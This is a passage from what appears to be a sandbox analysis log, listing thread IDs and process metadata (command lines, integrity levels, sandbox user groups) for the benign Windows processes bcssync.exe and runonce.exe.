os_tid = 0x448 Thread: id = 424 os_tid = 0x44c Thread: id = 429 os_tid = 0x460 Thread: id = 430 os_tid = 0x464 Thread: id = 431 os_tid = 0x468 Thread: id = 432 os_tid = 0x46c Thread: id = 434 os_tid = 0x474 Process: id = "40" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x154fa000" os_pid = "0x4a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x1f4" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 451 os_tid = 0x4ac Process: id = "41" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x37a04000" os_pid = "0x4b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "37" os_parent_pid = "0x1f4" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 452 os_tid = 0x4b4